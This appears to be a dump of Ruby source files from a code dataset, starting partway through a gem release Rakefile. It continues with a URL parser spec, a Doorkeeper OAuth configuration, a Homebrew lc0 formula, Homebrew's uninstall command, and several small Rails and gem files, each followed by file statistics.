tags = exec_command("git tag -l").split(/\n/)
raise "There is already a #{version} tag" if tags.include?(version)
# Tag it
exec_command("git tag #{Shellwords.escape(version)}")
exec_command("git push origin master")
exec_command("git push origin #{Shellwords.escape(version)}")
end
# Yank gem from rubygems
def self.yank
GEMS.each do |gem|
exec_command("gem yank #{gem} -v #{Shellwords.escape(version)}")
end
end
# Utility method: Execute command
def self.exec_command(command)
STDERR.puts "Command: #{command}"
output, code = Open3.capture2e(command, chdir: BASEDIR)
return output if code.exitstatus.zero?
STDERR.puts "Output:\n#{output}"
STDERR.puts "Exit code: #{code.exitstatus}"
exit code.exitstatus
end
end
end
namespace :gem do
task "build" do
branch = Octofacts::Gem.branch
unless branch == "master"
raise "On a non-master branch #{branch}; use gem:force-build if you really want to do this"
end
Octofacts::Gem.build
end
task "check" do
Octofacts::Gem.verify_gemfile_version!
end
task "force-build" do
branch = Octofacts::Gem.branch
unless branch == "master"
warn "WARNING: Force-building from non-master branch #{branch}"
end
Octofacts::Gem.build
end
task "push" do
Octofacts::Gem.push
end
task "release" do
branch = Octofacts::Gem.branch
unless branch == "master"
raise "On a non-master branch #{branch}; refusing to release"
end
[:check, :build, :tag, :push].each { |t| Rake::Task["gem:#{t}"].invoke }
end
task "tag" do
branch = Octofacts::Gem.branch
raise "On a non-master branch #{branch}; refusing to tag" unless branch == "master"
Octofacts::Gem.tag
end
task "yank" do
Octofacts::Gem.yank
end
end
| 31.408805 | 123 | 0.639167 |
4a0cea39e888454e9def786c4e4a2a9e12eaa5e9 | 1,336 | require "spec_helper"
describe "Parsing the generic URL 'tcp://fbeausoleil:[email protected]:3391/def'" do
def url
    @url ||= UrlParser.parse("tcp://fbeausoleil:[email protected]:3391/def")
end
it "should recognize the 'tcp' scheme" do
url.scheme.must_equal "tcp"
end
it "should recognize the 'fbeausoleil' user" do
url.user.must_equal "fbeausoleil"
end
it "should recognize the 'thepassword' thepassword" do
url.password.must_equal "thepassword"
end
it "should recognize the 'c.com' hostname" do
url.host.must_equal "c.com"
end
it "should recognize the '3391' port" do
url.port.must_equal 3391
end
it "should recognize the '/def' path" do
url.path.must_equal "/def"
end
end
describe "Parsing the generic URL 'udp://127.0.0.1:1234'" do
def url
@url ||= UrlParser.parse("udp://127.0.0.1:1234")
end
it "should recognize the 'udp' scheme" do
url.scheme.must_equal "udp"
end
it "should NOT recognize a user" do
url.user.must_be_nil
end
it "should NOT recognize a password" do
url.password.must_be_nil
end
it "should recognize a numerical host" do
url.host.must_equal "127.0.0.1"
end
it "should recognize a port" do
url.port.must_equal 1234
end
it "should NOT recognize a path" do
url.path.must_be_nil
end
end
| 20.875 | 84 | 0.689371 |
398f94b0d42995289ad5050dd4882a0ad51c3122 | 2,543 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::CognitiveServices::Customvisiontraining::V2_0
module Models
#
# Model object.
#
#
class ImageRegionCreateEntry
include MsRestAzure
# @return
attr_accessor :image_id
# @return
attr_accessor :tag_id
# @return [Float]
attr_accessor :left
# @return [Float]
attr_accessor :top
# @return [Float]
attr_accessor :width
# @return [Float]
attr_accessor :height
#
# Mapper for ImageRegionCreateEntry class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ImageRegionCreateEntry',
type: {
name: 'Composite',
class_name: 'ImageRegionCreateEntry',
model_properties: {
image_id: {
client_side_validation: true,
required: false,
serialized_name: 'imageId',
type: {
name: 'String'
}
},
tag_id: {
client_side_validation: true,
required: false,
serialized_name: 'tagId',
type: {
name: 'String'
}
},
left: {
client_side_validation: true,
required: false,
serialized_name: 'left',
type: {
name: 'Double'
}
},
top: {
client_side_validation: true,
required: false,
serialized_name: 'top',
type: {
name: 'Double'
}
},
width: {
client_side_validation: true,
required: false,
serialized_name: 'width',
type: {
name: 'Double'
}
},
height: {
client_side_validation: true,
required: false,
serialized_name: 'height',
type: {
name: 'Double'
}
}
}
}
}
end
end
end
end
| 24.68932 | 70 | 0.447503 |
2124b53de1aa0c0e2c1b0da9c7ed59b0864262c8 | 20,465 | # frozen_string_literal: true
Doorkeeper.configure do
# Change the ORM that doorkeeper will use (requires ORM extensions installed).
# Check the list of supported ORMs here: https://github.com/doorkeeper-gem/doorkeeper#orms
orm :active_record
# This block will be called to check whether the resource owner is authenticated or not.
resource_owner_authenticator do
current_user || warden.authenticate!(scope: :user)
end
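  # Authenticate the resource owner for the Resource Owner Password
  # Credentials grant by delegating to Devise's Warden strategy without
  # persisting the session (store: false).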
resource_owner_from_credentials do |routes|
request.params[:user] = {email: request.params[:username], password: request.params[:password]}
request.env['warden'].logout(:user)
request.env['devise.allow_params_authentication'] = true
request.env['warden'].authenticate!(scope: :user, store: false)
end
admin_authenticator do
if current_user
head :forbidden unless current_user.usa_admin?
else
redirect_to root_url
end
end
# You can use your own model classes if you need to extend (or even override) default
  # Doorkeeper models such as `Application`, `AccessToken` and `AccessGrant`.
#
  # By default Doorkeeper's ActiveRecord ORM uses its own classes:
#
# access_token_class "Doorkeeper::AccessToken"
# access_grant_class "Doorkeeper::AccessGrant"
# application_class "Doorkeeper::Application"
#
# Don't forget to include Doorkeeper ORM mixins into your custom models:
#
# * ::Doorkeeper::Orm::ActiveRecord::Mixins::AccessToken - for access token
# * ::Doorkeeper::Orm::ActiveRecord::Mixins::AccessGrant - for access grant
# * ::Doorkeeper::Orm::ActiveRecord::Mixins::Application - for application (OAuth2 clients)
#
# For example:
#
# access_token_class "MyAccessToken"
#
# class MyAccessToken < ApplicationRecord
# include ::Doorkeeper::Orm::ActiveRecord::Mixins::AccessToken
#
# self.table_name = "hey_i_wanna_my_name"
#
# def destroy_me!
# destroy
# end
# end
# Enables polymorphic Resource Owner association for Access Tokens and Access Grants.
# By default this option is disabled.
#
  # Make sure you properly set up your database and have all the required columns (run
  # `bundle exec rails generate doorkeeper:enable_polymorphic_resource_owner` and execute Rails
  # migrations).
#
  # If this option is enabled, Doorkeeper will store not only the Resource Owner's primary key
  # value, but also its type (class name). See the "Polymorphic Associations" section of the
# Rails guides: https://guides.rubyonrails.org/association_basics.html#polymorphic-associations
#
  # [NOTE] If you apply this option to an already existing project, don't forget to manually
  # update the `resource_owner_type` column in the database and fix the migration template, as it
  # will set a NOT NULL constraint for the Access Grants table.
#
# use_polymorphic_resource_owner
  # If you are planning to use Doorkeeper in a Rails 5 API-only application, then you might
  # want to use API mode, which will skip all the views management and change the way
  # Doorkeeper responds to requests.
#
# api_only
# Enforce token request content type to application/x-www-form-urlencoded.
# It is not enabled by default to not break prior versions of the gem.
#
# enforce_content_type
# Authorization Code expiration time (default: 10 minutes).
#
# authorization_code_expires_in 10.minutes
# Access token expiration time (default: 2 hours).
# If you want to disable expiration, set this to `nil`.
#
# access_token_expires_in 2.hours
  # Assign custom TTL for access tokens. Will be used instead of the access_token_expires_in
  # option if defined. In case the block returns a `nil` value, Doorkeeper falls back to the
# +access_token_expires_in+ configuration option value. If you really need to issue a
# non-expiring access token (which is not recommended) then you need to return
# Float::INFINITY from this block.
#
# `context` has the following properties available:
#
# `client` - the OAuth client application (see Doorkeeper::OAuth::Client)
# `grant_type` - the grant type of the request (see Doorkeeper::OAuth)
# `scopes` - the requested scopes (see Doorkeeper::OAuth::Scopes)
#
# custom_access_token_expires_in do |context|
# context.client.application.additional_settings.implicit_oauth_expiration
# end
# Use a custom class for generating the access token.
# See https://doorkeeper.gitbook.io/guides/configuration/other-configurations#custom-access-token-generator
#
# access_token_generator '::Doorkeeper::JWT'
# The controller +Doorkeeper::ApplicationController+ inherits from.
# Defaults to +ActionController::Base+ unless +api_only+ is set, which changes the default to
# +ActionController::API+. The return value of this option must be a stringified class name.
# See https://doorkeeper.gitbook.io/guides/configuration/other-configurations#custom-base-controller
#
# base_controller 'ApplicationController'
# Reuse access token for the same resource owner within an application (disabled by default).
#
  # This option protects your application from creating new tokens before the old valid one
  # expires, so your database doesn't bloat. Keep in mind that when this option is `on`, Doorkeeper
  # doesn't update the existing token's expiration time; it will create a new token instead.
# Rationale: https://github.com/doorkeeper-gem/doorkeeper/issues/383
#
# You can not enable this option together with +hash_token_secrets+.
#
# reuse_access_token
  # In case you enabled the `reuse_access_token` option, Doorkeeper will try to find a matching
  # token using the `matching_token_for` Access Token API that searches for valid records
# in batches in order not to pollute the memory with all the database records. By default
# Doorkeeper uses batch size of 10 000 records. You can increase or decrease this value
# depending on your needs and server capabilities.
#
# token_lookup_batch_size 10_000
# Set a limit for token_reuse if using reuse_access_token option
#
  # This option limits token reusability to some extent.
  # If not set, then the access_token will be reused unless it expires.
  # Rationale: https://github.com/doorkeeper-gem/doorkeeper/issues/1189
  #
  # This option should be a percentage (i.e. (0,100])
#
# token_reuse_limit 100
# Only allow one valid access token obtained via client credentials
# per client. If a new access token is obtained before the old one
# expired, the old one gets revoked (disabled by default)
#
# When enabling this option, make sure that you do not expect multiple processes
# using the same credentials at the same time (e.g. web servers spanning
# multiple machines and/or processes).
#
# revoke_previous_client_credentials_token
# Hash access and refresh tokens before persisting them.
# This will disable the possibility to use +reuse_access_token+
# since plain values can no longer be retrieved.
#
# Note: If you are already a user of doorkeeper and have existing tokens
# in your installation, they will be invalid without enabling the additional
# setting `fallback_to_plain_secrets` below.
#
# hash_token_secrets
# By default, token secrets will be hashed using the
# +Doorkeeper::Hashing::SHA256+ strategy.
#
# If you wish to use another hashing implementation, you can override
# this strategy as follows:
#
# hash_token_secrets using: '::Doorkeeper::Hashing::MyCustomHashImpl'
#
# Keep in mind that changing the hashing function will invalidate all existing
# secrets, if there are any.
# Hash application secrets before persisting them.
#
# hash_application_secrets
#
# By default, applications will be hashed
# with the +Doorkeeper::SecretStoring::SHA256+ strategy.
#
# If you wish to use bcrypt for application secret hashing, uncomment
# this line instead:
#
# hash_application_secrets using: '::Doorkeeper::SecretStoring::BCrypt'
# When the above option is enabled, and a hashed token or secret is not found,
  # you can allow falling back to another strategy. For users upgrading
# doorkeeper and wishing to enable hashing, you will probably want to enable
# the fallback to plain tokens.
#
# This will ensure that old access tokens and secrets
# will remain valid even if the hashing above is enabled.
#
# fallback_to_plain_secrets
  # Issue access tokens with refresh token (disabled by default); you may also
# pass a block which accepts `context` to customize when to give a refresh
# token or not. Similar to +custom_access_token_expires_in+, `context` has
# the following properties:
#
# `client` - the OAuth client application (see Doorkeeper::OAuth::Client)
# `grant_type` - the grant type of the request (see Doorkeeper::OAuth)
# `scopes` - the requested scopes (see Doorkeeper::OAuth::Scopes)
#
# use_refresh_token
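  #
  # A hedged sketch (using the `context` properties listed above): issue
  # refresh tokens only for the password grant:
  #
  # use_refresh_token do |context|
  #   context.grant_type == "password"
  # end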
# Provide support for an owner to be assigned to each registered application (disabled by default)
# Optional parameter confirmation: true (default: false) if you want to enforce ownership of
# a registered application
# NOTE: you must also run the rails g doorkeeper:application_owner generator
# to provide the necessary support
#
# enable_application_owner confirmation: false
# Define access token scopes for your provider
# For more information go to
# https://doorkeeper.gitbook.io/guides/ruby-on-rails/scopes
#
optional_scopes 'user/*.read', 'user/*.write', 'user/*.*'
# Allows to restrict only certain scopes for grant_type.
# By default, all the scopes will be available for all the grant types.
#
# Keys to this hash should be the name of grant_type and
# values should be the array of scopes for that grant type.
# Note: scopes should be from configured_scopes (i.e. default or optional)
#
# scopes_by_grant_type password: [:write], client_credentials: [:update]
# Forbids creating/updating applications with arbitrary scopes that are
# not in configuration, i.e. +default_scopes+ or +optional_scopes+.
# (disabled by default)
#
enforce_configured_scopes
# Change the way client credentials are retrieved from the request object.
# By default it retrieves first from the `HTTP_AUTHORIZATION` header, then
# falls back to the `:client_id` and `:client_secret` params from the `params` object.
# Check out https://github.com/doorkeeper-gem/doorkeeper/wiki/Changing-how-clients-are-authenticated
# for more information on customization
#
# client_credentials :from_basic, :from_params
# Change the way access token is authenticated from the request object.
# By default it retrieves first from the `HTTP_AUTHORIZATION` header, then
# falls back to the `:access_token` or `:bearer_token` params from the `params` object.
# Check out https://github.com/doorkeeper-gem/doorkeeper/wiki/Changing-how-clients-are-authenticated
# for more information on customization
#
# access_token_methods :from_bearer_authorization, :from_access_token_param, :from_bearer_param
# Forces the usage of the HTTPS protocol in non-native redirect uris (enabled
# by default in non-development environments). OAuth2 delegates security in
# communication to the HTTPS protocol so it is wise to keep this enabled.
#
# Callable objects such as proc, lambda, block or any object that responds to
# #call can be used in order to allow conditional checks (to allow non-SSL
# redirects to localhost for example).
#
# force_ssl_in_redirect_uri !Rails.env.development?
#
# force_ssl_in_redirect_uri { |uri| uri.host != 'localhost' }
# Specify what redirect URI's you want to block during Application creation.
# Any redirect URI is whitelisted by default.
#
# You can use this option in order to forbid URI's with 'javascript' scheme
# for example.
#
# forbid_redirect_uri { |uri| uri.scheme.to_s.downcase == 'javascript' }
  # Allows setting blank redirect URIs for Applications in case Doorkeeper is configured
# to use URI-less OAuth grant flows like Client Credentials or Resource Owner
# Password Credentials. The option is on by default and checks configured grant
# types, but you **need** to manually drop `NOT NULL` constraint from `redirect_uri`
# column for `oauth_applications` database table.
#
# You can completely disable this feature with:
#
# allow_blank_redirect_uri false
#
# Or you can define your custom check:
#
# allow_blank_redirect_uri do |grant_flows, client|
# client.superapp?
# end
# Specify how authorization errors should be handled.
# By default, doorkeeper renders json errors when access token
# is invalid, expired, revoked or has invalid scopes.
#
# If you want to render error response yourself (i.e. rescue exceptions),
# set +handle_auth_errors+ to `:raise` and rescue Doorkeeper::Errors::InvalidToken
# or following specific errors:
#
# Doorkeeper::Errors::TokenForbidden, Doorkeeper::Errors::TokenExpired,
# Doorkeeper::Errors::TokenRevoked, Doorkeeper::Errors::TokenUnknown
#
# handle_auth_errors :raise
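  #
  # A hedged sketch (assuming `handle_auth_errors :raise` is set): rescue the
  # exception in your own base controller, e.g.
  #
  #   rescue_from Doorkeeper::Errors::InvalidToken do
  #     render json: { error: "invalid_token" }, status: :unauthorized
  #   end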
# Customize token introspection response.
  # Allows adding your own fields to the default ones that are required by the OAuth spec
  # for the introspection response. These could be `sub`, `aud` and so on.
  # This configuration option can be a proc, lambda or any Ruby object that responds
  # to the `.call` method, and the result of its invocation must be a Hash.
#
# custom_introspection_response do |token, context|
# {
# "sub": "Z5O3upPC88QrAjx00dis",
# "aud": "https://protected.example.net/resource",
# "username": User.find(token.resource_owner_id).username
# }
# end
#
# or
#
# custom_introspection_response CustomIntrospectionResponder
# Specify what grant flows are enabled in array of Strings. The valid
# strings and the flows they enable are:
#
# "authorization_code" => Authorization Code Grant Flow
# "implicit" => Implicit Grant Flow
# "password" => Resource Owner Password Credentials Grant Flow
# "client_credentials" => Client Credentials Grant Flow
#
# If not specified, Doorkeeper enables authorization_code and
# client_credentials.
#
# implicit and password grant flows have risks that you should understand
# before enabling:
# http://tools.ietf.org/html/rfc6819#section-4.4.2
# http://tools.ietf.org/html/rfc6819#section-4.4.3
#
grant_flows %w[authorization_code]
  # Allows customizing the OAuth grant flows that +each+ application supports.
  # You can configure a custom block (or use a class responding to `#call`) that must
  # return `true` if the Application instance supports the requested OAuth grant flow
  # during the authorization request to the server. This configuration +doesn't+
  # set flows per application, it only allows checking whether an application supports
  # a specific grant flow.
#
# For example you can add an additional database column to `oauth_applications` table,
# say `t.array :grant_flows, default: []`, and store allowed grant flows that can
# be used with this application there. Then when authorization requested Doorkeeper
# will call this block to check if specific Application (passed with client_id and/or
# client_secret) is allowed to perform the request for the specific grant type
# (authorization, password, client_credentials, etc).
#
# Example of the block:
#
# ->(flow, client) { client.grant_flows.include?(flow) }
#
  # In case this option's invocation result is `false`, the Doorkeeper server returns
  # an :unauthorized_client error and stops the request.
#
# @param allow_grant_flow_for_client [Proc] Block or any object respond to #call
# @return [Boolean] `true` if allow or `false` if forbid the request
#
# allow_grant_flow_for_client do |grant_flow, client|
# # `grant_flows` is an Array column with grant
# # flows that application supports
#
# client.grant_flows.include?(grant_flow)
# end
  # If you need arbitrary Resource Owner-Client authorization you can enable this option
  # and implement the check you need. The config option must respond to #call and return
  # true if the resource owner is authorized for the specific application, or false
  # otherwise.
#
  # By default all Resource Owners are authorized for any Client (application).
#
# authorize_resource_owner_for_client do |client, resource_owner|
# resource_owner.admin? || client.owners_whitelist.include?(resource_owner)
# end
# Hook into the strategies' request & response life-cycle in case your
# application needs advanced customization or logging:
#
# before_successful_strategy_response do |request|
# puts "BEFORE HOOK FIRED! #{request}"
# end
#
# after_successful_strategy_response do |request, response|
# puts "AFTER HOOK FIRED! #{request}, #{response}"
# end
# Hook into Authorization flow in order to implement Single Sign Out
# or add any other functionality. Inside the block you have an access
# to `controller` (authorizations controller instance) and `context`
# (Doorkeeper::OAuth::Hooks::Context instance) which provides pre auth
# or auth objects with issued token based on hook type (before or after).
#
# before_successful_authorization do |controller, context|
# Rails.logger.info(controller.request.params.inspect)
#
# Rails.logger.info(context.pre_auth.inspect)
# end
#
# after_successful_authorization do |controller, context|
# controller.session[:logout_urls] <<
# Doorkeeper::Application
# .find_by(controller.request.params.slice(:redirect_uri))
# .logout_uri
#
# Rails.logger.info(context.auth.inspect)
# Rails.logger.info(context.issued_token)
# end
# Under some circumstances you might want to have applications auto-approved,
# so that the user skips the authorization step.
# For example if dealing with a trusted application.
#
# skip_authorization do
# true
# end
# Configure custom constraints for the Token Introspection request.
# By default this configuration option allows to introspect a token by another
# token of the same application, OR to introspect the token that belongs to
# authorized client (from authenticated client) OR when token doesn't
# belong to any client (public token). Otherwise requester has no access to the
# introspection and it will return response as stated in the RFC.
#
# Block arguments:
#
# @param token [Doorkeeper::AccessToken]
# token to be introspected
#
# @param authorized_client [Doorkeeper::Application]
# authorized client (if request is authorized using Basic auth with
# Client Credentials for example)
#
# @param authorized_token [Doorkeeper::AccessToken]
# Bearer token used to authorize the request
#
  # In case the block returns `nil` or `false`, introspection responds with a 401 status code
  # when using an authorized token to introspect, or you'll get 200 with an { "active": false }
  # body when using an authorized client to introspect, as stated in
  # RFC 7662 section 2.2 (Introspection Response).
#
  # Use with caution:
  # Keep in mind that the three parameters passed to the block can be nil, as in the following cases:
  # `authorized_client` is nil if and only if `authorized_token` is present, and vice versa.
  # `token` will be nil if and only if `authorized_token` is present.
  # So remember to use `&.` or check for presence before calling methods on
  # them, to make sure you don't get a NoMethodError exception.
#
# You can define your custom check:
#
# allow_token_introspection do |token, authorized_client, authorized_token|
# if authorized_token
# # customize: require `introspection` scope
# authorized_token.application == token&.application ||
# authorized_token.scopes.include?("introspection")
# elsif token.application
# # `protected_resource` is a new database boolean column, for example
# authorized_client == token.application || authorized_client.protected_resource?
# else
# # public token (when token.application is nil, token doesn't belong to any application)
# true
# end
# end
#
# Or you can completely disable any token introspection:
#
# allow_token_introspection false
#
# If you need to block the request at all, then configure your routes.rb or web-server
# like nginx to forbid the request.
# WWW-Authenticate Realm (default: "Doorkeeper").
#
# realm "Doorkeeper"
end
| 42.195876 | 109 | 0.739262 |
7ab3aaa2f3c6117aef12edcfd0638e258616a721 | 70 | require "env-dependencies/railtie"
require "env-dependencies/version"
| 23.333333 | 34 | 0.828571 |
e2b4c0619284b22d45bb6814518e88542f9a209b | 1,427 | class Lc0 < Formula
desc "Open source neural network based chess engine"
homepage "https://lczero.org/"
url "https://github.com/LeelaChessZero/lc0.git",
:tag => "v0.26.0",
:revision => "09edc73cf177f5f1d00e54549b6fa491e0507b56"
license "GPL-3.0"
revision 1
bottle do
cellar :any_skip_relocation
rebuild 1
sha256 "468c173bd7435f97d516b9b4fb1817402a807de7f918a1683747b03fd8885d8c" => :catalina
sha256 "c39b2e6a6c154e7a82c358faa46ff878ef6334e9e58638a550baef78a6fe0db1" => :mojave
sha256 "7db068bc2f8104a9fa487e91ff06add704d2c491b1894a343fa6d8bc39a8b0e6" => :high_sierra
end
depends_on "meson" => :build
depends_on "ninja" => :build
depends_on "[email protected]" => :build # required to compile .pb files
resource "network" do
url "https://training.lczero.org/get_network?sha=00af53b081e80147172e6f281c01daf5ca19ada173321438914c730370aa4267", :using => :nounzip
sha256 "12df03a12919e6392f3efbe6f461fc0ff5451b4105f755503da151adc7ab6d67"
end
def install
system "meson", *std_meson_args, "-Dgtest=false", "--buildtype", "release", "build/release"
cd "build/release" do
system "ninja", "-v"
libexec.install "lc0"
end
bin.write_exec_script libexec/"lc0"
libexec.install resource("network")
end
test do
assert_match /^bestmove e2e4$/,
shell_output("lc0 benchmark --backend=blas --nodes=1 --num-positions=1")
end
end
| 31.711111 | 138 | 0.728101 |
bbde92f8260bf5a2491a3eab0d67a1339ed715e5 | 330 | class CreateProjects < ActiveRecord::Migration
def change
create_table :projects do |t|
t.string :name
t.references :user, index: true
t.float :latitude
t.float :longitude
t.float :sqft
t.string :street
t.string :city
t.string :state
t.string :country
end
end
end
| 20.625 | 46 | 0.621212 |
79f271f0e0de5f4fe4c6bcfe5e0049c367b7a1f2 | 1,021 | require_relative '../../../spec_helper'
class CoreConceptPage < CoreAuthorityPage
include Logging
include Page
include CollectionSpacePages
DEPLOYMENT = Deployment::CORE
def display_name_input(index); input_locator([fieldset(CoreConceptData::CONCEPT_TERMS.name, index)], CoreConceptData::TERM_DISPLAY_NAME.name) end
def display_name_add_btn; add_button_locator([fieldset(CoreConceptData::CONCEPT_TERMS.name)]) end
def enter_display_name(name, index)
logger.debug "Entering display name '#{name}'"
wait_for_element_and_type(display_name_input(index), name)
end
def verify_display_name(name, index)
wait_until(Config.short_wait, "Expected display name '#{name}', but got '#{element_value(display_name_input index)}'") do
text_values_match?(name, element_value(display_name_input index))
end
end
def enter_number_and_text(data)
enter_acquisition_ref_num data
enter_acquisition_note data
end
def enter_number(data)
enter_acquisition_ref_num data
end
end | 30.939394 | 147 | 0.77669 |
21be54a7f032aab1e65986dad2bb61fcbe25a791 | 122 | module Consumer
module Postgres
module Controls
Identifier = Consumer::Controls::Identifier
end
end
end
| 15.25 | 49 | 0.713115 |
2181530dde90ff6d4e87e2be8322c263cad505a9 | 288 | require 'mkmf'
dir_config('bsdiff')
fail unless have_header('unistd.h')
fail unless have_header('bzlib.h')
fail unless have_library('bz2')
fail unless have_func('BZ2_bzWrite','bzlib.h')
fail unless have_macro('BZ_OK','bzlib.h')
create_header('bsdiff_config.h')
create_makefile('bsdiff')
| 26.181818 | 46 | 0.770833 |
87baaadbfa942650d2ed55163455fc0fdcb4abd5 | 652 | # -*- encoding: utf-8 -*-
# stub: pyu-ruby-sasl 0.0.3.3 ruby lib
Gem::Specification.new do |s|
s.name = "pyu-ruby-sasl"
s.version = "0.0.3.3"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["Stephan Maka", "Ping Yu"]
s.date = "2010-10-18"
s.description = "Simple Authentication and Security Layer (RFC 4422)"
s.email = "[email protected]"
s.homepage = "http://github.com/pyu10055/ruby-sasl/"
s.rubygems_version = "2.2.2"
s.summary = "SASL client library"
s.installed_by_version = "2.2.2" if s.respond_to? :installed_by_version
end
| 32.6 | 105 | 0.679448 |
21e4e1cc17c906f5e670418123f26b83ea3b8f77 | 153 | require File.expand_path('../../../spec_helper', __FILE__)
describe "Kernel#protected_methods" do
it "needs to be reviewed for spec completeness"
end
| 25.5 | 58 | 0.751634 |
6a27971b1eee9e90a3e9e5316ea25c8433b6f95c | 92 | # desc "Explaining what the task does"
# task :active_preview do
# # Task goes here
# end
| 18.4 | 38 | 0.695652 |
d569324f6f457bde2c00802457ac4575e40726c7 | 209 | # frozen_string_literal: true
class AddOverviewAndDescriptionToTopic < ActiveRecord::Migration[5.0]
def change
add_column :topics, :overview, :text
add_column :topics, :description, :text
end
end
| 23.222222 | 69 | 0.760766 |
87812a42a3eaacd97522ee34d855e67e73a4d54c | 644 | Gem::Specification.new do |spec|
spec.name = "web-under-construction"
spec.version = "0.1.1"
spec.authors = ["Farid Nizam"]
spec.email = ["[email protected]"]
spec.summary = "Website Under Construction Jekyll theme."
spec.homepage = "https://github.com/yuimatcha/web-under-construction"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0").select { |f| f.match(%r!^(assets|_layouts|_includes|_config\.yml)!i) }
spec.add_runtime_dependency "jekyll", "~> 4.2.0"
spec.add_runtime_dependency "jekyll-seo-tag", "~> 2.7.1"
end | 40.25 | 126 | 0.597826 |
1cd0a1755308d56cb5117fdce05a4ef930677274 | 553 | class UserMailer < ApplicationMailer
# Subject can be set in your I18n file at config/locales/en.yml
# with the following lookup:
#
# en.user_mailer.account_activation.subject
#
def account_activation(user)
@user = user
mail to: user.email, subject: "Account activation"
end
# Subject can be set in your I18n file at config/locales/en.yml
# with the following lookup:
#
# en.user_mailer.password_reset.subject
#
def password_reset(user)
@user = user
mail to: user.email, subject: "Password reset"
end
end
| 22.12 | 65 | 0.707052 |
62092376dbb52d106419fbd70ec9ca0bbc1b993c | 1,765 | #: * `uninstall`, `rm`, `remove` [`--force`] <formula>:
#: Uninstall <formula>.
#:
#: If `--force` is passed, and there are multiple versions of <formula>
#: installed, delete all installed versions.
require "keg"
require "formula"
require "migrator"
module Homebrew
def uninstall
raise KegUnspecifiedError if ARGV.named.empty?
if !ARGV.force?
ARGV.kegs.each do |keg|
keg.lock do
puts "Uninstalling #{keg}... (#{keg.abv})"
keg.unlink
keg.uninstall
rack = keg.rack
rm_pin rack
if rack.directory?
versions = rack.subdirs.map(&:basename)
verb = versions.length == 1 ? "is" : "are"
puts "#{keg.name} #{versions.join(", ")} #{verb} still installed."
puts "Remove them all with `brew uninstall --force #{keg.name}`."
end
end
end
else
ARGV.named.each do |name|
rack = Formulary.to_rack(name)
name = rack.basename
if rack.directory?
puts "Uninstalling #{name}... (#{rack.abv})"
rack.subdirs.each do |d|
keg = Keg.new(d)
keg.unlink
keg.uninstall
end
end
rm_pin rack
end
end
rescue MultipleVersionsInstalledError => e
ofail e
puts "Use `brew uninstall --force #{e.name}` to remove all versions."
ensure
# If we delete Cellar/newname, then Cellar/oldname symlink
# can become broken and we have to remove it.
if HOMEBREW_CELLAR.directory?
HOMEBREW_CELLAR.children.each do |rack|
rack.unlink if rack.symlink? && !rack.resolved_path_exists?
end
end
end
def rm_pin(rack)
Formulary.from_rack(rack).unpin rescue nil
end
end
| 26.742424 | 78 | 0.583569 |